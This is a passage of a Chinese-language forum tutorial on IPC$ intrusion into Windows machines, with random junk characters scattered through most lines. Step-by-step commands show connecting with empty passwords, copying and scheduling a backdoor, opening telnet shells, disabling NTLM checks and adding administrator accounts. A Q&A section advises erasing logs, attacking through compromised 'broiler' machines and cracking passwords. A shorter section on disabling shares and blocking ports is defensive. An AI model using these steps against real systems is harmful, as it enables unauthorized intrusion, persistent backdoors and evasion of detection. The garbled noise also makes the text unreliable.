C:\>net use [url=file://\\127.0.0.1\ipc$]\\127.0.0.1\ipc$[/url] "" /user:admintitrators
\\用掃到的空口令建立連接　　 4 O) N  n7 A  u7 W1 p9 M
[2]
c:\>net view [url=file://\\127.0.0.1]\\127.0.0.1[/url]
\\查看遠(yuǎn)程的共享資源
[3]
C:\>copy srv.exe [url=file://\\127.0.0.1\admin$\system32]\\127.0.0.1\admin$\system32[/url] & t. R2 g3 }  ~: Y6 Q0 X
\\將一次性后門srv.exe復(fù)制到對(duì)方的系統(tǒng)文件夾下，前提是admin$開啟　　
[4]+ K/ z0 \3 N* \; V: h
C:\>net time [url=file://\\127.0.0.1]\\127.0.0.1[/url]
\\查看遠(yuǎn)程主機(jī)的當(dāng)前時(shí)間- _9 k9 @) B! k/ @
[5]* w0 d+ U+ c5 {. ~
C:\>at [url=file://\\127.0.0.1]\\127.0.0.1[/url] 時(shí)間 srv.exe 8 A- ^, E1 O$ d5 o# E6 `* u% `
\\用at命令遠(yuǎn)程運(yùn)行srv.exe，需要對(duì)方開啟了''Task Scheduler''服務(wù)　　, q6 r$ @/ m9 j' c0 M0 ^, s
[6]# C9 _: v9 D1 O3 Z& _" ^
C:\>net time [url=file://\\127.0.0.1]\\127.0.0.1[/url]: e0 {. g6 L/ i9 w
\\再次查看當(dāng)前時(shí)間來估算srv.exe是否已經(jīng)運(yùn)行，此步可以省略
[7]　　　　4 f9 V# Q" f9 Z9 l2 [: _1 d
C:\>telnet 127.0.0.1 99
\\開一個(gè)新窗口，用telnet遠(yuǎn)程登陸到127.0.0.1從而獲得一個(gè)shell(不懂shell是什么意思？那你就把它想象成遠(yuǎn)程機(jī)器的控制權(quán)就好了，#作像DOS)，99端口是srv.exe開的一次性后門的端口　　" x) ^9 G1 E/ x
[8]
C:\WINNT\system32>net start telnet; D' Q- V. m2 C* e
\\我們?cè)趧倓偟顷懮系膕hell中啟動(dòng)遠(yuǎn)程機(jī)器的telnet服務(wù)，畢竟srv.exe是一次性的后門，我們需要一個(gè)長久的后門便于以后訪問，如果對(duì)方的telnet已經(jīng)啟動(dòng)，此步可省略1 O: T, _3 p" u; b) F2 ^
[9]
C:\>copy ntlm.exe [url=file://\\127.0.0.1\admin$\system32]\\127.0.0.1\admin$\system32[/url]
\\在原來那個(gè)窗口中將ntlm.exe傳過去，ntlm.exe是用來更改telnet身份驗(yàn)證的　　
[10], S, k8 L; F& T  ?5 N7 A
C:\WINNT\system32>ntlm.exe 0 g( R: ]7 L0 Y6 a/ u2 p( d1 {
\\在shell窗口中運(yùn)行ntlm.exe，以后你就可以暢通無阻的telnet這臺(tái)主機(jī)了& S" U; O  M+ M3 E/ {3 i  y
　　
[11]$ K9 Y6 r0 x4 X9 f7 s' T( Y
C:\>telnet 127.0.0.1 23; Q& K4 P! U/ o: G% L- V
\\在新窗口中telnet到127.0.0.1，端口23可省略，這樣我們又獲得一個(gè)長期的后門( N( \$ Q! @5 d/ `# ?
[12]
C:\WINNT\system32>net user 帳戶名 密碼 /add
C:\WINNT\system32>net uesr guest /active:yes6 y2 r4 f: S/ O3 u4 D7 a$ W1 M8 a
C:\WINNT\system32>net localgroup administrators 帳戶名 /add  i) R( k+ t* i9 U1 Y4 h* ^/ J
[url=file://\\telnet]\\telnet[/url]上以后，你可以建立新帳戶，激活guest，把任何帳戶加入管理員組等
好了，寫到這里我似乎回到了2，3年前，那時(shí)的ipc$大家都是這么用的，不過隨著新工具的出現(xiàn)，上面提到的一些工具和命令現(xiàn)在已經(jīng)不常用到了，那就讓我們看看現(xiàn)在的高效而簡(jiǎn)單的ipc$入侵吧。
[1], S! t/ g5 V1 W2 i( A4 w
p***ec.exe [url=file://\\IP]\\IP[/url] -u 管理員賬號(hào) -p 密碼 cmd
\\用這個(gè)工具我們可以一步到位的獲得shell
OpenTelnet.exe [url=file://\\server]\\server[/url] 管理員賬號(hào) 密碼 NTLM的認(rèn)證方式 port5 m6 `( D2 e" _4 `/ `
\\用它可以方便的更改telnet的驗(yàn)證方式和端口，方便我們登陸* q& A0 f5 |: n# h- e3 ]
[2]
已經(jīng)沒有第二步了，用一步獲得shell之后，你做什么都可以了，安后門可以用winshell，克隆就用ca吧，開終端用3389.vbe，記錄密碼用win2kpass，總之好的工具不少，隨你選了，我就不多說了。
. H! ~$ F0 ~( D( {1 a# @9 Z9 }( q
十四 如何防范ipc$入侵察看本地共享資源8 q) i( ]$ t( \. i0 Z
運(yùn)行-cmd-輸入net share
刪除共享(每次輸入一個(gè)）
net share ipc$ /delete" e7 ]5 }! t1 d3 F' U; U0 Y
net share admin$ /delete/ r( x; r8 h6 E6 ]; I5 D; y3 ~  f; B
net share c$ /delete
net share d$ /delete（如果有e,f,……可以繼續(xù)刪除）
1 禁止空連接進(jìn)行枚舉(此#作并不能阻止空連接的建立)  E. `, I) Z* s
運(yùn)行regedit，找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的鍵值改為：1
如果設(shè)置為"1"，一個(gè)匿名用戶仍然可以連接到IPC$共享，但無法通過這種連接得到列舉SAM賬號(hào)和共享信息的權(quán)限；在Windows 2000 中增加了"2"，未取得匿名權(quán)的用戶將不能進(jìn)行ipc$空連接。建議設(shè)置為1。如果上面所說的主鍵不存在，就新建一個(gè)再改鍵值。如果你覺得改注冊(cè)表麻煩，可以在本地安全設(shè)置中設(shè)置此項(xiàng)： 在本地安全設(shè)置－本地策略－安全選項(xiàng)－''對(duì)匿名連接的額外限制''3 `! K" P5 P5 r+ W% n5 f' `
# b# ~4 f. v( Z* D# M) }
2 禁止默認(rèn)共享
1）察看本地共享資源
運(yùn)行-cmd-輸入net share3 P2 N7 ^+ G3 ~- p) u( x) b
2）刪除共享（重起后默認(rèn)共享仍然存在）
net share ipc$ /delete7 ~5 v& l$ C" k# d
net share admin$ /delete. ]; `4 W4 S# r3 o% f+ ^: i2 P7 _+ Y
net share c$ /delete
net share d$ /delete（如果有e,f,……可以繼續(xù)刪除）
3）停止server服務(wù)) D5 V+ @2 ~2 D
net stop server /y （重新啟動(dòng)后server服務(wù)會(huì)重新開啟）; p& _' C, F! N9 w
4）禁止自動(dòng)打開默認(rèn)共享（此#作并不能關(guān)閉ipc$共享） 1 G3 }: D# {9 |( R8 W
運(yùn)行-regedit
server版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的鍵值改為:00000000。 ( ?9 v1 V2 M9 n$ P/ v
pro版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的鍵值改為:00000000。 6 S( T8 P6 [  c* i# M' `: z- Y
這兩個(gè)鍵值在默認(rèn)情況下在主機(jī)上是不存在的，需要自己手動(dòng)添加，修改后重起機(jī)器使設(shè)置生效。
! A* ~5 F4 H7 ^9 }) Z
3 關(guān)閉ipc$和默認(rèn)共享依賴的服務(wù):server服務(wù)
如果你真的想關(guān)閉ipc$共享，那就禁止server服務(wù)吧：4 _8 R. T& |3 w) b; v# s
控制面板-管理工具-服務(wù)-找到server服務(wù)（右擊）-屬性-常規(guī)-啟動(dòng)類型-選已禁用，這時(shí)可能會(huì)有提示說：XXX服務(wù)也會(huì)關(guān)閉是否繼續(xù)，因?yàn)檫€有些次要的服務(wù)要依賴于server服務(wù)，不要管它。 ' D! E8 a( T( H) O+ Z# L9 E, n1 P

4 屏蔽139，445端口
由于沒有以上兩個(gè)端口的支持，是無法建立ipc$的，因此屏蔽139，445端口同樣可以阻止ipc$入侵。- K! Y) A. e8 C4 w8 Z# U  M
1）139端口可以通過禁止NBT來屏蔽8 T+ J8 y3 O1 z& G# ?9 a
本地連接－TCP/IT屬性－高級(jí)－WINS－選‘禁用TCP/IT上的NETBIOS’一項(xiàng)
2）445端口可以通過修改注冊(cè)表來屏蔽2 @3 W2 T' r2 [
添加一個(gè)鍵值
Hive: HKEY_LOCAL_MACHINE
Key: System\Controlset\Services\NetBT\Parameters. T+ o5 N* c6 s
Name: SMBDeviceEnabled & R7 B) w, `$ e0 f
Type: REG_DWORD
value: 0
修改完后重啟機(jī)器
注意：如果屏蔽掉了以上兩個(gè)端口，你將無法用ipc$入侵別人。 8 U8 S: `# h' X* }, k
3）安裝防火墻進(jìn)行端口過濾

6 設(shè)置復(fù)雜密碼，防止通過ipc$窮舉出密碼，我覺得這才是最好的辦法，增強(qiáng)安全意識(shí)，比不停的打補(bǔ)丁要安全的多。

十五 ipc$入侵問答精選( J# D! W* r+ o! [1 c% J
1.進(jìn)行ipc$入侵的時(shí)候，會(huì)在服務(wù)器中留下記錄，有什么辦法可以不讓服務(wù)器發(fā)現(xiàn)嗎？3 `3 N( @/ P4 b! d1 _' v
答：留下記錄是一定的，你走后用清除日志程序刪除就可以了，或者用肉雞入侵。

2.你看下面的情況是為什么，可以連接但不能復(fù)制
net use [url=file://\\***.***.***.***\ipc$]\\***.***.***.***\ipc$[/url] "密碼" /user:"用戶名"
命令成功
copy icmd.exe [url=file://\\***.***.***.***\admin$]\\***.***.***.***\admin$[/url]* r0 R) h" F# s0 N
找不到網(wǎng)絡(luò)路徑" V: g( ]! ]4 ^7 `# W+ m: d( u" D9 ?
命令不成功
答：像“找不到網(wǎng)絡(luò)路徑”“找不到網(wǎng)絡(luò)名”之類的問題，大多是因?yàn)槟阆胍獜?fù)制到的共享文件夾沒有開啟，所以在復(fù)制的時(shí)候會(huì)出現(xiàn)錯(cuò)誤，你可以試著找找其他的共享文件夾。

3.如果對(duì)方開了IPC$，且能建立空聯(lián)接，但打開C、D盤時(shí)，都要求密碼，我知道是空連接沒有太多的權(quán)限，但沒別的辦法了嗎？
答：建議先用流光或者別的什么掃描軟件試著猜解一下密碼，如果猜不出來，只能放棄，畢竟空連接的能力有限。

4.我已經(jīng)猜解到了管理員的密碼，且已經(jīng)ipc$連接成功了，但net view [url=file://\\ip]\\ip[/url]發(fā)現(xiàn)它沒開默認(rèn)共享，我該怎么辦？' S" ?+ ^; o% s: Q
答：首先糾正你的一個(gè)錯(cuò)誤，用net view [url=file://\\ip]\\ip[/url]是無法看到默認(rèn)共享的，你可以試著將文件復(fù)制到c$，d$看看，如果都不行，說明他關(guān)閉了默認(rèn)共享，那你就用opentelnet.exe或p***ec.exe吧，用法上面有。  a% R# S9 f4 g4 e: O

5.ipc$連接成功后，我用下面的命令建立了一個(gè)帳戶，卻發(fā)現(xiàn)這個(gè)帳戶在我自己的機(jī)器上，這是怎么回事？
net uset ccbirds /add/ J. V' j, g) R! y" k% w
答：ipc$建立成功只能說明你與遠(yuǎn)程主機(jī)建立了通信隧道，并不意味你取得了一個(gè)shell，只有在獲得一個(gè)shell（比如telnet）之后，你才能在遠(yuǎn)程機(jī)器建立一個(gè)帳戶，否則你的#作只是在本地進(jìn)行。! U- H2 \  M6 p: n5 @" O
0 D7 U1 @, }  k& v
6.我已進(jìn)入了一臺(tái)肉機(jī)，用的管理員賬號(hào)，可以看他的系統(tǒng)時(shí)間，但是復(fù)制程序到他的機(jī)子上卻不行，每次都提示“拒絕訪問，已復(fù)制0個(gè)文件”，是不是對(duì)方有什么服務(wù)沒開，我該怎么辦？# n3 w0 ?1 z  T+ S; {. `& f
答：一般來說“拒絕訪問”都是權(quán)限不夠的結(jié)果，可能是你用的帳戶有問題，還有一種可能，如果你想向普通共享文件夾復(fù)制文件卻返回這個(gè)錯(cuò)誤，說明這個(gè)文件夾設(shè)置的允許訪問用戶中不包括你（哪怕你是管理員），這一點(diǎn)我在上一期文章中分析了。+ k9 o% w: R" P. [4 o# S9 ~3 w
4 ^; d" L6 r7 [$ ^* y
7.我用Win98能與對(duì)方建立ipc$連接嗎？
答：理論上不可以，要進(jìn)行ipc$的#作，建議用win2000，用其他#作系統(tǒng)會(huì)帶來許多不必要的麻煩。6 ?* J9 M7 q$ g! M( H7 `7 ?

8.我用net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "" /user ""成功的建立了一個(gè)空會(huì)話，但用nbtstat -A IP 卻無法導(dǎo)出用戶列表，這是為什么？
答：空會(huì)話在默認(rèn)的情況下是可以導(dǎo)出用戶列表的，但如果管理員通過修改注冊(cè)表來禁止導(dǎo)出列表，就會(huì)出現(xiàn)你所說的情況；還有可能是你自己的NBT沒有打開，netstat命令是建立在NBT之上的?！　?span style="FONT-SIZE: 0px;COLOR: #fff">5 L5 d! O0 l" g% E' H

9.我建立ipc$連接的時(shí)候返回如下信息：‘提供的憑據(jù)與已存在的憑據(jù)集沖突’，怎么回事？
答：呵呵，這說明你已經(jīng)與目標(biāo)主機(jī)建立了ipc$連接，兩個(gè)主機(jī)間同時(shí)建立兩個(gè)ipc$連接是不允許的。

10.我在映射的時(shí)候出現(xiàn)：4 h; B2 m7 l8 C1 ?( R
F:\>net use h: [url=file://\\211.161.134.*\e$]\\211.161.134.*\e$[/url]! E0 m0 B: M+ h& B2 y: R
系統(tǒng)發(fā)生 85 錯(cuò)誤。
本地設(shè)備名已在使用中。這是怎么回事？8 g  N! ]9 u( y4 s5 d
答：你也太粗心了吧，這說明你有一個(gè)h盤了，映射到?jīng)]有的盤符吧！

11.我建立了一個(gè)連接f:\>net use [url=file://\\*.*.*.*\ipc$]\\*.*.*.*\ipc$[/url] "123" /user:"guest" 成功了，但當(dāng)我映射時(shí)出現(xiàn)了錯(cuò)誤，向我要密碼，怎么回事？
F:\>net use h: [url=file://\\*.*.*.*\c$]\\*.*.*.*\c$[/url]
密碼在 [url=file://\\*.*.*.*\c$]\\*.*.*.*\c$[/url] 無效。, [: `' V% ~* i/ T% U
請(qǐng)鍵入 [url=file://\\*.*.*.*\c$]\\*.*.*.*\c$[/url] 的密碼:
系統(tǒng)發(fā)生 5 錯(cuò)誤。& M5 P/ m. P& `$ o9 N
拒絕訪問。# `1 l4 ^' E- [
答：呵呵，向你要密碼說明你當(dāng)前使用的用戶權(quán)限不夠，不能映射C$這個(gè)默認(rèn)共享，想辦法提升權(quán)限或者找管理員的弱口令吧！默認(rèn)共享一般是需要管理員權(quán)限的。* [, K2 a( V( ?' {  x! X- ~

12.我用superscan掃到了一個(gè)開了139端口的主機(jī)，但為什么不能空連接呢？
答：你混淆了ipc$與139的關(guān)系，能進(jìn)行ipc$連接的主機(jī)一定開了139或445端口，但開這兩個(gè)端口的主機(jī)可不一定能空連接，因?yàn)閷?duì)方可以關(guān)閉ipc$共享.# B! D) E6 u  `# \; I
5 I/ c" P% ?5 v
13.我門局域網(wǎng)里的機(jī)器大多都是xp，我用流光掃描到幾個(gè)administrator賬號(hào)口令是空，而且可以連接，但不能復(fù)制東西，說錯(cuò)誤5。請(qǐng)問為什么？9 F% Q3 \6 X& C- `1 _# S
答：xp的安全性要高一些，在安全策略的默認(rèn)設(shè)置中，對(duì)本地帳戶的網(wǎng)絡(luò)登錄進(jìn)行身份驗(yàn)證的時(shí)候，默認(rèn)為來賓權(quán)限，即使你用管理員遠(yuǎn)程登錄，也只具有來賓權(quán)限，因此你復(fù)制文件，當(dāng)然是錯(cuò)誤5：權(quán)限不夠。
) c% C( @0 \$ b" V3 N
14.我用net use [url=file://\\192.168.0.2\ipc$]\\192.168.0.2\ipc$[/url] "password" /user:"administrator" 成功，可是 net use i: [url=file://\\192.168.0.2\c]\\192.168.0.2\c[/url]
出現(xiàn)請(qǐng)鍵入 [url=file://\\192.168.0.2]\\192.168.0.2[/url] 的密碼，怎么回事情呢？我用的可是管理員呀？應(yīng)該什么都可以訪問呀？% X) ?; s7 o+ t) ~7 c
答：雖然你具有管理員權(quán)限，但管理員在設(shè)置c盤共享權(quán)限時(shí)（注意：普通共享可以設(shè)置訪問權(quán)限，而默認(rèn)共享則不能）可能并未設(shè)置允許administrator訪問，所以會(huì)出現(xiàn)上述問題。
/ o3 G. a' N1 {) \
15.如果自己的機(jī)器禁止了ipc$, 是不是還可以用ipc$連接別的機(jī)器？如果禁止server服務(wù)呢？( Q0 A! _( W# a5 i- u+ J" z& x
答：禁止以上兩項(xiàng)仍可以發(fā)起ipc$連接，不過這種問題自己動(dòng)手試驗(yàn)會(huì)更好。
4 u8 r' h7 d7 I4 A! q# w  @2 i! Q
16.能告訴我下面的兩個(gè)錯(cuò)誤產(chǎn)生的原因嗎？
c:\>net time [url=file://\\61.225]\\61.225[/url].*.*- f/ M* b) b3 s7 Z
系統(tǒng)發(fā)生 5 錯(cuò)誤。
拒絕訪問。! ]4 ^  ?$ y8 z6 k, K* |- Z; Q
c:\>net view [url=file://\\61.225]\\61.225[/url].*.*+ c! a: f$ d  \  u  [& o; ~
系統(tǒng)發(fā)生 5 錯(cuò)誤。
拒絕訪問。
答：起初遇到這個(gè)問題的時(shí)候我也很納悶，錯(cuò)誤5表示權(quán)限不夠，可是連空會(huì)話的權(quán)限都可以完成上面的兩個(gè)命令，他為什么不行呢？難道是他沒建立連接？后來那個(gè)粗心的同志告訴我的確是這樣，他忘記了自己已經(jīng)刪了ipc$連接，之后他又輸入了上面那兩個(gè)命令，隨 之發(fā)生了錯(cuò)誤5。
. k6 y  Q4 h1 I8 C5 m
17.您看看這是怎么回事？# \. Y; Y: H: ]+ y
F:\>net time2 `" B' I: o  o& F7 k% n
找不到時(shí)間服務(wù)器。
請(qǐng)鍵入 NET HELPMSG 3912 以獲得更多的幫助。3 e# b+ J  Y3 s2 A9 u
答：答案很簡(jiǎn)單，你的命令錯(cuò)了，應(yīng)該是net time [url=file://\\ip]\\ip[/url]
沒輸入ip地址，當(dāng)然找不到服務(wù)器。view的命令也應(yīng)該有ip地址，即：net view [url=file://\\ip]\\ip[/url]